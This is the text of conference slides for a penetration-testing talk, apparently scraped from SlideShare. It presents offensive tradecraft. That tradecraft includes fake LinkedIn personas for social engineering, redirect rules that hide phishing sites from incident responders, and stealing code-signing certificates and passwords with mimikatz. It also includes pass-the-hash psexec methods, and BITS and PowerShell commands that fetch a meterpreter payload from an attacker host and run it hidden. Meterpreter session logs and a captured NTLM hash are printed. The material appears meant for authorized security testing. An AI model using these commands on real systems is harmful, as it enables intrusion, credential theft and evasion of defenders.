SlideShare a Scribd company logo
1 of 120
Whoami
• Rob Fuller (mubix)
  – Twitter -> mubix
  – Blog -> http://www.room362.com
  – NoVA Hackers

• Previous Talks
  –   Dirty Little Secrets
  –   Networking for Penetration Testers
  –   Metasploit Framework/Pro Training for Rapid7
  –   Deep Magic 101
  –   Couch to Career in 80 hours
Whoami
• Chris Gates (CG)
   –   Twitter carnal0wnage
   –   Blog carnal0wnage.attackresearch.com
   –   Job Partner/Principal Security Consultant at Lares
   –   NoVAHackers
• Previous Talks
   –   ColdFusion for Pentesters
   –   From LOW to PWNED
   –   Dirty Little Secrets
   –   Attacking Oracle (via web)
   –   wXf Web eXploitation Framework
   –   Open Source Information Gathering
   –   Attacking Oracle (via TNS)
   –   Client-Side Attacks
Infoz
• No philosophical stuff this time
  – Just digging in and showing neat shit we’ve been
    doing since last year
  – Last year’s stuff still applies although was told we
    were “preaching to the choir”…who still doesn’t
    do it…maybe on Sundays…
  – Anway…
Agenda
•   Putting in the hours on LinkedIn for SE
•   Giving IR teams a run for their money
•   Stealing certs
•   Mimikatz with Metasploit
•   New Incognito && Netview release
•   Ditto
•   10 ways to PSEXEC
•   Why doesn’t SYSTEM have proxy settings!?!
•   Windows is my backdoor (bitsadmin, powershell, wmi )
•   WebDAV server via metasploit
•   Turning your External Pentest into an Internal one
•   Overview of current DNS Payload options (if time)
The setup…

We like to use LinkedIn for OSINT but
      how can we do it better?
Becoming a LiON
• Why?
   • API is based on YOUR
     connections
   • 2nd and 3rd level connections
     count but are give different
     access
• Creating a fake account
• Connecting with Recruiters ++
• Connecting with “Open
  Networkers”
LinkedIn API
       • URL:
         https://developer.linkedin.com
       • Allows you to query
         information
           – Company info
           – Groups
           – Name about your 1st &
             2nd order connections
Big Ass LinkedIn Network
• Meet “John”
• John has been busy being awesome on LinkedIn
  for the last few months
2nd level connections to Obamz
LinkedIn API
• Limited by YOUR connections and network
  reach
• API gives you NO info about 3rd order
  connections
• Usually you’ll see more info via the web on 3rd
  order people
• The total number of search results possible for
  any search will vary depending on the
  user's account level.
LinkedIn API
• An example (Palantir)
  CG                 vs.      John
LinkedIn API
• An example (Pfizer)
  CG                  vs.      John
LinkedIn API
• An example (Bank of America)
  CG                vs.        John
More LinkedIn
• Turning an email list into validated LinkedIn
  Contacts/emails
• Import them!
More LinkedIn
• Get some emails
More LinkedIn
• Import them!




• Need them in a specific format though.
  – Ruby to the rescue
More LinkedIn
• Get some ruby
More LinkedIn
• Get some contacts
More LinkedIn
• Import and do your thing
The setup…

IR teams F**k up all my hard work
     preparing phishing attacks
Phishing and F**king with IR Teams
• Thanks to people like SANS organizations have
  a standardized, repeatable, process 
  – What’s not to like?
  – Submit to the sandbox
  – Submit to the malware lookup site
  – I feel safe!
• But, sure does suck when you spend all that
  time setting up a phish only to have it ruined
  by this well tuned, standardized process…
Phishing and F**king with IR Teams
• What you *could* do…
   – Build a phish that EVERYONE will report
   – Capture the IR process via log/scan/analyst activity
• This gives you intel on:
   – Which services are contracted out for analysis
      • And their IPs
   – Are humans in the mix
      • And their IPs
   – Level of sophistication
Phishing and F**king with IR Teams
• Once you know who’s coming to do analysis,
  we can send them to an alternate site and
  keep the users going to the phish site.
• How?
Phishing and F**king with IR Teams
• Apache and mod-rewrite is an option

RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
    RewriteCond %{HTTP_USER_AGENT}
^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
    RewriteCond %{HTTP_USER_AGENT}
^.*(HTTrack|clshttp|archiver|load
er|email|nikto|miner|python|wget|Wget).* [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww-
perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR]
    RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR] #outside
IR
    RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR]
#googlebot
   RewriteCond %{REMOTE_ADDR} ^88.88. [OR]
 RewriteRule ^(/.*) http://www.totallysafesite.com/$1
[R,L]
The setup…

I want to find and steal code signing
      certificates from victims
Stealing Certificates
• Why?
• Have you tried to get/buy one? It’s a pain in
  the ass.
  – I see why people just steal them
• Impact
  – Sign code as the company
  – Now your code may be *more* trusted by the
    victim…or at least less suspicious
  – Can you steal their wildcard SSL cert?
Stealing Certificates
• If you export one, it has to have a password 
• However, if YOU export it, YOU can set the
  password.
• You can do this all on the command line
  – Use mozilla’s certutil
     • http://www.mozilla.org/projects/security/pki/nss/tools
       /certutil.html
  – Use Mimikatz 
Stealing Certificates
•   Mozilla certutil
•   Compile your own, or download precompiled bins

certutil.exe -L -d
C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.def
ault-1339854577637
VeriSign Class 3 Extended Validation SSL CA                  ,,
DigiCert High Assurance CA-3                                 ,,
VeriSign Class 3 International Server CA - G3                ,,
COMODO Extended Validation Secure Server CA 2                ,,
Verified Publisher LLC's COMODO CA Limited ID
u,u,u <------- code signer
Akamai Subordinate CA 3                                      ,,
VeriSign, Inc.                                               ,,
--snip--
Stealing Certificates
•   Mozilla certutil
•   -L List all the certificates, or display information about a named certificate, in a
    certificate database.

certutil.exe -L -d
C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.defaul
t-1339854577637
VeriSign Class 3 Extended Validation SSL CA                  ,,
DigiCert High Assurance CA-3                                 ,,
VeriSign Class 3 International Server CA - G3                ,,
COMODO Extended Validation Secure Server CA 2                ,,
Verified Publisher LLC's COMODO CA Limited ID                u,u,u
Akamai Subordinate CA 3                                      ,,
VeriSign, Inc.                                               ,,
--snip

•   “u”  Certificate can be used for authentication or signing 
•   http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
Stealing Certificates
• Mozilla pk12util.exe
• To extract the cert:

C:UsersCGDownloadsnss-3.10nss-3.10bin>pk12util.exe -
n "Verified Publisher LLC's COMODO CA Limited ID" -d
C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdh
wru.default-1339854577637 -o test2.p12 -W mypassword1

•   http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
Stealing Certificates
Via MimiKatz (list certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates
CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit‘

Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My
    - sqlapps01
         Container Clé : SELFSSL
         Provider : Microsoft RSA SChannel Cryptographic Provider
         Type       : AT_KEYEXCHANGE
         Exportabilité : OUI
         Taille clé : 1024

mimikatz(commandline) # exit
Stealing Certificates
Via MimiKatz (export certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates
CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My
    - sqlapps01
         Container Clé : SELFSSL
         Provider : Microsoft RSA SChannel Cryptographic Provider
         Type       : AT_KEYEXCHANGE
         Exportabilité : OUI
         Taille clé : 1024
         Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK
         Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK

mimikatz(commandline) # exit
The setup…

   Mimikatz is awesome and I want to
execute it without putting bins on the box
Mimikatz gives me clear text
       passwords?
So does WCE!
Mimikatz
•   Mimikatz detected by AV
•   Sekurlsa.dll detected by AV
•   WCE detected by AV
•   WCE IN MEMORY! (kinda)


     Stop submitting $#!+ to Virus Total!
Mimikatz
• New version (6 Sep 12) supports in-memory
•   execute -H -i -c -m -d calc.exe -f mimikatz.exe -a
    '"sekurlsa::logonPasswords full" exit'
The setup…

Incognito is awesome and I want to
  show/leverage the new features
New Incognito (find_token)
C:>find_token.exe
usage:

find_token.exe <server_name_or_ip> | -f
<server_list_file> [username] [password]
New Incognito (find_token)
C:>find_token.exe dc1
[*] Scanning for logged on users...

Server Name                Username
------------------------------------------------------
dc1           PROJECTMENTORjdoe
dc1           PROJECTMENTORjdoe
Release of NETVIEW
Release of NETVIEW
C:Documents and SettingsuserDesktop>netview

Netviewer Help
--------------------------------------------------------------------

-d domain              : Specifies a domain to pull a list of hosts from
                   uses current domain if none specified

-f filename.txt          : Speficies a file to pull a list of hosts from
-o filename.txt           : Out to file instead of STDOUT
Release of NETVIEW
C:Documents and SettingsuserDesktop>netview -d
                                                              [+] Host: WIN7X64
[*] -d used without domain specifed - using current domain
[+] Number of hosts: 3
                                                              Enumerating AD Info
                                                              [+] WIN7X64 - Comment -
[+] Host: DC1                                                 [+] WIN7X64 - OS Version - 6.1

Enumerating AD Info                                           Enumerating IP Info
[+] DC1 - Comment -
                                                              [+] WIN7X64 - IPv4 Address - 172.16.10.216
[+] DC1 - OS Version - 6.1
[+] DC1 - Domain Controller
                                                              Enumerating Share Info
Enumerating IP Info                                           [+] WIN7X64 - Share - ADMIN$          Remote Admin
[+] DC1 - IPv4 Address - 172.16.10.10                         [+] WIN7X64 - Share - C$           Default share
                                                              [+] WIN7X64 - Share - IPC$          Remote IPC
Enumerating Share Info
[+] DC1 - Share - ADMIN$      Remote Admin
[+] DC1 - Share - C$       Default share                      Enumerating Session Info
[+] DC1 - Share - IPC$      Remote IPC                        [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
[+] DC1 - Share - NETLOGON      Logon server share
[+] DC1 - Share - SYSVOL     Logon server share               Enumerating Logged-on Users
Enumerating Session Info
[+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0

Enumerating Logged-on Users
[+] DC1 - Logged-on - PROJECTMENTORjdoe
[+] DC1 - Logged-on - PROJECTMENTORjdoe
Release of NETVIEW
AND IT’S ALREADY ON GITHUB:
The setup…

Dropping binaries is a necessity sometimes,
  persistence for instance, but unless you
name your bin SVCHOST.exe you don’t want
               it looking like:
this:
Meet ‘DITTO’
He does something really well…
And it’s not just the icon…
Yes, it’s already on Github too
The setup…

Who doesn’t want more ways to
        psexec??!!!
10 ways to PSEXEC
Sysinternal PSEXEC
POSITIVES                   NEGATIVES
• Never going to be on      • Need a Password
  any AV list               • Leaves PSEXESVC
• Executes binary as user     running
  specified, not as         • Have to touch disk if not
  SYSTEM, so no Proxy         present already
  concerns
Metasploit PSEXEC
POSITIVES               NEGATIVES
• Supports the use of   • Some AVs flag service
  Hashes                  binary due to injection
                          techniques used within
                        • Rundll32.exe is running
Metasploit PSEXEC-MOF
POSITIVES                 NEGATIVES
• Drop a file and         • XP and below
  Windows automatically     – (only because Metasploit
  runs it. (MAGIC!)           doesn’t automatically
                              compile MOFs)
                          • ADMIN$ required
                            – (Unless you make code edits)
Metasploit PSEXEC-As-User
POSITIVES                   NEGATIVES
• Executes as the current   • Some AVs flag service
  user                        binary due to injection
• No need for passwords       techniques used within
  or hashes                 • Rundll32.exe is running
• Also a great way to
  bypass UAC.. But more
  on that later
WMI
POSITIVES                   NEGATIVES
• Never going to be on      • Need a Password
  any AV list
• Executes binary as user
  specified, not as
  SYSTEM, so no Proxy
  concerns
Powershell
POSITIVES                   NEGATIVES
• Never going to be on      • Need a Password
  any AV list
• Executes binary as user
  specified, not as
  SYSTEM, so no Proxy
  concerns
RemCom
POSITIVES                  NEGATIVES
• Open source psexec       • Binary, so again, can’t
• You can add Pass-The-      go over Metasploit
  Hash                       sessions directly
  – (open source an all)      – portfwd Fu can still be
                                used on a single IP
                           • Runs as SYSTEM
Winexe
POSITIVES                  NEGATIVES
• Open source psexec       • Binary, so again, can’t
• Supports Pass-The-Hash     go over Metasploit
                             sessions directly
                              – portfwd Fu can still be
                                used on a single IP
                           • Runs as SYSTEM
smbexec
POSITIVES                  NEGATIVES
• Open source psexec       • Binary
• Supports Pass-The-Hash     – (but designed with
                               shoveling over
                               Metasploit in mind)




    http://sourceforge.net/projects/smbexec/
Pass the hash for 15 years stuff here
•   Firefox
•   smbclient
•   smbmount
•   Rpcclient

• http://passing-the-hash.blogspot.com/
Zfasel’s stuff here
• If it ever gets released works ;-)

                LOVE YOU FASEL!!


          Go see his talk, it works now…

                      maybe…
Python && impacket
• http://code.google.com/p/impacket/

• PTH support for SMB/MSSQL/
WinRM (‘new’ hotness)
POSITIVES                   NEGATIVES
• Never going to be on      • Need a Password
  any AV list
• Executes binary as user
  specified, not as
  SYSTEM, so no Proxy
  concerns
Do you look for 5985 internally on your pen tests?
                 we would suggest it ;-)




src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
Victim: winrm quickconfig –q

Attacker:
winrm quickconfig -q
winrm set winrm/config/client @{AllowUnencrypted=“true”;TrustedHosts=“192.168.1.101”}


      Yes.. That’s right, THE ATTACKER says which hosts to trust…




 Sooooo much fun to be had!
 Oh, and did I mention it’s completely interactive? (You
 can enter password questions)
Metasploit PSEXEC-WinRM
POSITIVES                   NEGATIVES
• Never going to be on      • Need a Password
  any AV list
• Executes binary as user
  specified, not as
  SYSTEM, so no Proxy
  concerns

   DISCLAIMER: CURRENTLY VAPORWARE!!
                  but…
Build your own pyBear
• PySMB supports auth with using hashes
• Thanks Rel1k for the heads up on the library – but
  I’m not a good enough coder to get it working



• Compile your own psexec with hash support
• ;-)
• Impacket (again)
Build your own Bear.rb
• Metasploit’s Rex library
  – already has the hash passing goodness
  – HDM committed a stand-alone version of PSEXEC
    on September 5th 2012
The setup…

UAC sucks… bypassing only takes 2
            things…
The setup…

If you’re an admin and UAC is stopping
                 you…
Find a network with more than one
          Windows box…
The setup…

Why doesn’t SYSTEM have proxy settings
                 !?!
• If OS !> Vista
   – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit)
• WINDOWS/EXEC (or any of the other psexec
  methods we just talked about)
   – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM
     AUTOSCRIPT http://wpad/wpad.dat “;” (or PAC)
   – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM
     /MANUAL_PROXY 192.168.5.100:3128 “;”
   – After your done use NO_PROXY in place of
     AUTOSCRIPT or MANUAL_PROXY
• Then MSF-PSEXEC to your heart’s content,
  SYSTEM will now use the proxy you’ve set.
NETSH & ProxyCFG
• Sets the WinHTTP proxy
  – Not Windows’ proxy settings, only is used if the
    program uses WinHTTP
• XP
  – proxycfg –p 192.168.92.100:3128
  – or
  – proxycfg –u (pulls it from IE)
• Vista+
  – netsh winhttp set proxy 192.168.92.100:3128
  – or
  – netsh winhttp import proxy ie
REGISTRY Poking
• HKLMSoftwarePoliciesMicrosoftWindows
  CurrentVersionInternet Settings
• ProxySettingsPerUser [DWORD]
• Set to 0 for settings are System Wide
• Set to 1 for settgings are Per User
The setup…

 Neat binaries that do backdoor/RAT
behavior that are already there for us.
Windows is my backdoor
BITS
  “BITS is a file transfer service that provides a
  scriptable interface through Windows PowerShell.
  BITS transfers files asynchronously in
  the foreground or in the background. And, it
  automatically resumes file transfers after network
  disconnections and after a computer is restarted.”

  http://technet.microsoft.com/en-us/library/dd819415.aspx
Windows is my backdoor
BITS
  There are three types of BITS transfer jobs:

     - A download job downloads files to the client
computer.
     - An upload job uploads a file to the server.
     - An upload-reply job uploads a file to the server and
receives a reply file from the server application.
Windows is my backdoor
BITS (How-To)
• Set the server side up (HTTP, not standard setup)
   – Google
• Uses powershell to upload/download

import BITS
PS C:Userscg>Import-Module BitsTransfer
Download files over BITS

PS C:Userscg> Start-BitsTransfer
http://192.168.26.128/upload/meterp443.exe
C:UserscgDesktopmeterpdownload443.exe
Windows is my backdoor
BITS (How-To)
Upload files over BITS
PS C:Userscg> Start-BitsTransfer -Source
C:UserscgDesktopfile2upload.txt
-Destination
http://192.168.26.128/upload/myfile.txt
-transfertype upload
Windows is my backdoor
BITS over Wireshark
Windows is my backdoor
• Powershell
• OMG Powershell!
Windows is my backdoor
• Powershell
Windows is my backdoor
           • PowerShell
             – Does A LOT!
             – Check out Exploit Monday
               and PowerSploit
             – Carlos Perez has had lots of
               PowerShell blog posts
             – I haven't found a
               meterpreter feature that
               cant be done with
               PowerShell
Windows is my backdoor
• Powershell cool examples
  – Powershell hashdump (in SET)
  – Poweshell exec method in MSSQL_Payload
  – PowerSploit (syringe dll inject/shellcode exec ala
    PowerShell)
Windows is my backdoor
• Powershell cool examples
• Port Scanner:
          PS C:> 1..1024 | % {
          echo
          ((new-object Net.Sockets.TcpClient)
          .Connect("10.1.1.14",$_)) "$_ is open"
          } 2>$null

          25 is open


•   From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor
• Powershell cool examples
• Port Sweeper
PS C:> 1..255 | % {
echo
((new-object Net.Sockets.TcpClient)
.Connect("10.1.1.$_",445)) "10.1.1.$_" }
2>$null
10.1.1.5


•   From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor
• Powershell cool examples
• Bypass execution policy
  – Dave Kennedy talked about this at defcon 18
  – Requires PowerShell v2.0 or above

  – powershell.exe -ExecutionPolicy
    Bypass -NoLogo -NonInteractive -
    NoProfile -WindowStyle Hidden -
    File "C:do_neat_ps_shit.ps1"
Windows is my backdoor
• CreateCMD stuff from Dave Kennedy
•   In SET

• Pshexec by Carlos Perez
•   https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb

• B64 encodes the command so you can pass
  via meterp or in another script
• powershell -noexit –EncodedCommand
  [b64enc BLOB]
Windows is my backdoor
• Metasploit to generate PowerShell
• Uses old powersploit technique
Windows is my backdoor
• How to run PowerShell from Meterpreter
   – Use a bat file
C:>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
NoProfile -WindowStyle Hidden -File C:ipinfo2.ps1


Example:
meterpreter > execute -H -f cmd.exe -a '/c C:runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL
received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 ->
4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
The setup…

A webdav server to download files from.
       Why? Because we can.
MSF WebDAV server
MSF WebDAV server
• net use ipdocuments /User:Guest

• copy ipdocumentsmyexe.exe myexe.exe

• Available on github:
• https://github.com/carnal0wnage/Metasploit-
  Code/blob/master/modules/exploits/webdav_file_server.rb
MSF WebDAV server
msf exploit(webdav_file_server) > [*] 192.168.26.1:17870
OPTIONS /documents/myexe.exe

[*] 192.168.26.1:17870   PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870   PROPFIND => 207 File
(/documents/myexe.exe)
[*] 192.168.26.1:17870   PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870   PROPFIND => 207 File
(/documents/myexe.exe)
[*] 192.168.26.1:17870   PROPFIND   /documents
[*] 192.168.26.1:17870   PROPFIND   => 301 (/documents)
[*] 192.168.26.1:17870   PROPFIND   /documents/
[*] 192.168.26.1:17870   PROPFIND   => 207 Directory
(/documents/)
[*] 192.168.26.1:17870   PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870   GET => Delivering Local EXE Payload
[ /tmp/myexe.exe ]
The Setup…

LAN based attacks are instant wins on
 internal pentests, but difficult if not
impossible to do on externals… or are
                they…
While we are on the subject…
Does anyone know what happens when you try
to access a share on a windows box that doesn’t
exist from another windows box??

                    I want to access
                        SHARE3

                    I don’t have
                       SHARE3

                     Is that it?
nope
     (if webclient service is started – Vista+ manual start)


                                     I want to access SHARE3

                                  I don’t have SHARE3 on SMB

                             I want to access SHARE3 over WebDAV




If you are following along at home, windows is always (unless disabled) listening on
Port 445 (SMB) so an attacker can’t override it, but rarely have anything listening on port 80
On-target NBNS Spoofing




              FakeNetbiosNS FTW!
Meet the Microsoft Windows Firewall
        “PORTPROXY” feature
Basically it’s port-forwarding but can do so for:               IPv4 -> IPv4
                                                                IPv6 -> IPv4
                                                                IPv6 -> IPv6
                                                                IPv4 -> IPv6




 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
Now convince/cause someone to
connect to a fake share on VICTIM1…
weeeeeeeeeeeeee
•   *] 50.50.50.50 http_ntlm - Request '/share3/test.png'...
•   [*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000
•   NTLMv2 Response Captured from WIN7X86
•   DOMAIN: PROJECTMENTOR USER: jadmin
•   LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
•   NTHASH:9eed2162b1c7424780204fb9ced5bc1a
    NT_CLIENT_CHALLENGE:0101000000000000067a01b4
    b097cd01c77c09ccedbfc55d0000000002001a0070007
    2006f006a006500630074006d0065006e0074006f0072
    000000000000000000
why
                           1. Give me SHARE3!
                           5. OK, you are in my Intranet, AUTHAUTH

                                       4. AUTH! via portpoxy

                                               3. AUTH!
And yes, SMB_Relay works                       7. kthxbai!
just fine if you have a route
set up over your
                                                                     2. Portproxy!
meterpreter shell of the
                                                                     6. AUTOAUTH!
connect back. Oh, did I
mention cross-protocol
means you can go to
the same host?! ;-)
Respectfully refrained from any
         Inside->Out
Google images. You’re welcome.
The setup…

Are DNS Payloads useful? Let’s talk about
          our public options
DNS Payloads
• Quick talk on currently available DNS payloads
• What’s available?
  – CANVAS DNS Mosdef
  – DNS Cat (skull security)
  – Metasploit DNS Payloads
DNS Payloads
• Canvas DNS Mosdef
  – Uses DNS TXT Records
    • So its UDP and correctly formed?
  – BUT
    • Directly connects to the host
    • Uses TXT records,
          – I’ve never pentested someone *good* that allowed this
DNS Payloads
• Canvas DNS Mosdef
DNS Payloads
• DNSCat (Skullsecurity)
  –   http://www.skullsecurity.org/wiki/index.php/Dnscat


  – Uses recursive DNS requests
        • So its UDP and correctly formed?
  – Has a metasploit payload, so can make a msf
    dnscat binary to run and get shell
  – Same as dnscat –d domain –exec “cmd.exe”
  – BUT
        • But does recursive DNS requests
        • Never worked for me IRL
DNS Payloads
• DNSCat (Skullsecurity)
DNS Payloads
• DNSCat (java version)
  –   http://tadek.pietraszek.org/projects/DNScat/


  – Comes as java libs
  – Requires PPP to tunnel anything useful
        • *nix only?
DNS Payloads
• DNSCat (java version)
DNS Payloads
• Metasploit DNS
  – Currently there are no full DNS payloads
     • Aside from skullsecurity dnscat payload (not in trunk)
  – There are several payloads that will got fetch
    ANOTHER payload and exec it for you via DNS
     • dns_txt_query_exec.rb
     • dns_query_exec.rb
     • https://github.com/rapid7/metasploit-
       framework/pull/173
  – Something in the works:
    http://dev.metasploit.com/redmine/issues/444#note-9
DNS Payloads
• Bottom Line
  – Nothing public that’s usable ATM
Dirty Little Secrets They Didn't Teach You In Pentest Class v2

More Related Content

What's hot

[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
Secure socket layer
Secure socket layerSecure socket layer
Secure socket layerBU
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockownerkhan
 
Scratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit MaheshwariScratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit MaheshwariOWASP Delhi
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
AWS Survival Guide
AWS Survival GuideAWS Survival Guide
AWS Survival GuideKen Johnson
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokensOWASP
 
Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016Karl Fosaaen
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityАліна Шепшелей
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5usnyff
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...Area41
 
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...Benjamin Delpy
 
The Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick Maludy
The Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick MaludyThe Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick Maludy
The Dynamic Duo of Puppet and Vault tame SSL Certificates, Nick MaludyPuppet
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
 

What's hot (20)

[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 
Secure socket layer
Secure socket layerSecure socket layer
Secure socket layer
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknock
 
Scratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit MaheshwariScratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit Maheshwari
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
AWS Survival Guide
AWS Survival GuideAWS Survival Guide
AWS Survival Guide
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens
 
Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016
 
Denis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application securityDenis Zhuchinski Ways of enhancing application security
Denis Zhuchinski Ways of enhancing application security
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
